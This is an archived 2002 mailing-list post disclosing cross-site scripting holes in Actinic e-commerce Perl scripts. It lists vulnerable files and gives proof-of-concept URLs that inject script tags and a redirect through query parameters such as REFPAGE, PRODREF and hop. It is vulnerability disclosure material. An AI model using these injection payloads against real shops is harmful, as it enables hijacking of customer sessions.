Vulnerability Development mailing list archives
Holes in Actinic E-commerce services.
From: "Frog Man" <leseulfrog () hotmail com>
Date: Wed, 06 Feb 2002 16:00:27 +0100
http://www.actinic.com http://www.actinic.co.uk/ http://www.actinic-europe.com/ Versions : 4.7.0 & - With the files : bb|000|001|.pl ca| |002| os| |003| sh| |004| ss| |005| | |006| | |007| | |009| | |010| | |011| | |012| | |020| | |036| | |045| | |046| | |137| | |143| | |410| referrer.pl **000***.pl?<script>alert('CSS')</script> and : /ca000007.pl?ACTION=SHOWCART&REFPAGE=">[ ANYSCRIPT ] /ss000007.pl?PRODREF=<--SCRIPT--> /ca000001.pl?ACTION=SHOWCART&hop="><script>alert('HoP!')</script>&PATH=acatalog%2f http://www.host.com/ss000007.pl?REFPAGE=http%3A%2F%2Fwere.to.go&PREVQUERY=ACTION%3DSHOWCART&SS=yiiiihaaaaa&PR=-1&TB=A&SHOP= More details in french : http://www.bal-team.t2u.com/Tuts/actinic.txt frog-m@n _________________________________________________________________Discutez en ligne avec vos amis, essayez MSN Messenger : http://messenger.msn.fr/
Current thread:
- Holes in Actinic E-commerce services. Frog Man (Feb 06)